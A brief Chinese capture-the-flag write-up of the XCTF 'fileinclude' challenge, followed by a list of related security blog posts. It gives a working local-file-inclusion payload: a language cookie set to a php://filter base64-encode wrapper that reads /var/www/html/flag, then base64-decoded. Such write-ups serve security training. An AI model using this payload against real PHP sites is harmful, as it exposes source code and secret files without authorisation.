攻防世界-fileinclude

原题

解题思路

题目已经告诉了,flag在flag.php中,先查看网页源代码(快捷键CTRL+U)。

通过抓包修改,可以把lan变量赋值flag。在cookie处修改。新打开的网页没有cookie,直接添加"Cookie: language=php://filter/read=convert.base64-encode/resource=/var/www/html/flag"即可。

base64解码

相关推荐
锐速网络12 小时前
轻量化安全建设指南:无需硬件的SaaS化勒索病毒防御方案
网络安全·云备份·主机安全·saas安全·勒索病毒防护·轻量化安全·中小企业安全
小小小小钰儿14 小时前
1.5-Python网络编程
开发语言·网络·python·web安全·计算机·网络安全
持敬chijing17 小时前
CTFshow-WEB-新年好?解题思路
安全·web安全·网络安全·网络攻击模型
兢谨网安19 小时前
Web应用渗透测试方案
网络·网络安全
XLYcmy21 小时前
基于图神经网络的物联网固件漏洞静态挖掘技术方案 上
神经网络·物联网·网络安全·二进制·elf·漏洞检测·固件
Frag0ut1 天前
Chrome打开某网站突然卡顿,是中了“挖矿病毒”吗?
chrome·网络安全·浏览器·chromium·挖矿病毒·技术科普
恣睢s2 天前
BugKu——shell
网络安全
黄金龙PLUS2 天前
5个1024比特大状态置换算法的设计与分析
算法·网络安全·密码学·哈希算法·同态加密
XUEYUAN52128 天前
ASN 自治系统号风控:平台如何通过 IP 所属自治域批量识别代理流量
python·网络协议·http·网络安全·socks5
其实防守也摸鱼8 天前
内网穿透与反向代理:原理、工具与实战指南
android·大数据·运维·安全·网络安全·自动化·渗透